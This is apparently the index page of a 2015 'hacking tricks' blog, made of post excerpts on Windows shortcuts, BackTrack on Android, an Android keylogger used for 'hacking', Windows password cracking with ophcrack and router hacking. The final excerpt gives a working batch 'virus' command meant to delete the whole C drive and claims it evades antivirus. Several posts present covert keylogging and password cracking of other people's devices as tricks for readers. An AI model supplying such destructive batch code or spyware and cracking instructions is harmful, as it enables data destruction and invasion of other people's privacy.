Thursday, 3 September 2015

Windows Best Run Commands List

Accessibility Options : access.cpl Add Hardware : hdwwiz.cpl Add / Remove Programs : appwiz.cpl Administrative Tools : control admintools Automatic Updates : wuaucpl.cpl Wizard file transfer Bluethooth : fsquirt Calculator : calc Certificate Manager : certmgr.msc Character : charmap Checking disk : chkdsk Manager of the album (clipboard) : clipbrd Command Prompt : cmd Service components (DCOM) : dcomcnfg Computer Management : compmgmt.msc DDE active sharing : ddeshare Device Manager : devmgmt.msc DirectX Control Panel (if installed) : directx.cpl DirectX...

Install Backtrack on any Android Device

    Video:- https://youtu.be/ipU2h1u5Ehw I found this amazing tutorial which will let you install the easy hacking operating system for hacker i.e "BackTrack 5" on an Android Device. The most important thing was that they installed Backtrack using a VNC option. In this you don't have to change your origina operating system and can access backtrack like an application only. If you know linux you can probably write small script to run the backtrack 5 on your android device. Description: Backtrack is a very popular linux distribution...

Monday, 31 August 2015

How to use android keylogger for hacking.....

Android Keylogger Hello friends Today I am going to show you android hacking application An keylogger type monitoring application . Let Me tell about what is a keylogger? A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a small program that monitors each keystroke a user types on a specific keyboard. Keyloggers are used to Record System events: Power offs, SD cards removal, USB connections, WiFi connections. Now what is Android Keylogger(Kidlooger.apk Apps)? What is Kidlooger? KidLogger free application...
Adroid Keylogger Hello friends Today I am going to show you android hacking application An keylogger type monitoring application . Let Me tell about what is a keylogger? A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a small program that monitors each keystroke a user types on a specific keyboard. Keyloggers are used to Record System events: Power offs, SD cards removal, USB connections, WiFi connections. Now what is Android Keylogger(Kidlooger.apk Apps)? What is Kidlooger? KidLogger free application...

Hacking Window 7 Password Using Ophcrack

In this tutorial i will teach you to hack Window 7 password using free open source software called ophcrack. This hack also works on Windows XP and Windows Vista. So let get started. What Is Ophcrack ? Opcrack is an open source windows password cracker based on rainbow tables. It comes with Graphical user interface(GUI) and runs on multiple platform such windows, linux and mac.  It allows you to recover or hack windows password. How...

Send WhatsApp message without using any number

 In this post, I'll tell you how can you use WhatsApp without using your mobile number, i.e. WhatsApp without using any number. Friends, you might be knowing that Facebook has launched web version of the WhatsApp currently for the chrome browser which is becoming very popular day by day. For messaging anyone without using any number, do the following steps: Steps: Uninstall WhatsApp from your Android phone. Download and...

Monday, 24 August 2015

Learn To Make Dangerous Virus In A Minute

In my previous post i had teach you guys to create virus that disable mouse and Virus to format Hard Disk. In this post i will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus. What will this virus do ?   You will create this virus using...

Enable God Mode In Windows 7 And Vista

In this tutorial i will show you to enable God Mode in Windows 7 and Windows Vista. By enabling God mode you can access all your windows setting from one folder and it makes really easy to access and change windows settings. This work 32 as well as 64 bit operating system. So lets enable God mode on your computer. How to do it ?   1. On your desktop right click and create a New Folder.   2. Rename this folder to the code given...

Learn To Hide Files Behind The Images

There are some important  files or document you want to hide from others on your computer. To do that you might be creating folder inside folder to hide such files but in todays tutorial i will change this by teaching you a interesting trick to hide files behind images.To hide a file behind a image  means that if any one opens that image he will see the image, but to see the hidden file we need to open that image in a specific...

Thursday, 20 August 2015

Create A Undeletable And Unrenamable Folders In Windows

In this tutorial you will learn cool and simple trick to Create an undeletable and unrenamable Folders In Windows operating system. Most of the Peoples are not aware that it is possible to create Undeletable, Unrenamable folder in windows without any software. To Test this concept just follow simple steps given below. Try to make a new folder in windows & give it name con,aux, lpt1, lpt2, lpt3 up to lpt9. you won't be allowed to...

Password Protect Any Folder Without Any Software

In my previous post i have teach you to hide files behind images. In this tutorial i will show you interesting and usefull trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7). Follow below tutorial to learn this trick. How To Lock Folder ?    1. Open Notepad and Copy code given below into it. cls @ECHO OFF title coolhacking-tricks.blogspot.com if...

Tuesday, 17 March 2015

WARNING:Don't Hack any authorized router,otherwise you'll be put into jail.    certain things to be followed..such as creating virtual machine!!!running in your OS if you have windows..!! Download VMware Workstation here: http://www.softpedia.com/get/System/OS-Enhancements/VMware-Workstation.shtml  Create a new virtual machine like i have created...!!!    press enter......go on  At...

Learn To Make Dangerous Virus In A Minute.....

What will this virus do ?   You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. How to Make the virus ?    1. Open Notepad and copy below code into it. @Echo off Del C:\ *.* |y    2. Save this file as virus.bat (Name can be anything but .bat is must)    3. Now, running this file will delete all the content of C Drive. Warning: Please don't try to run on your own computer...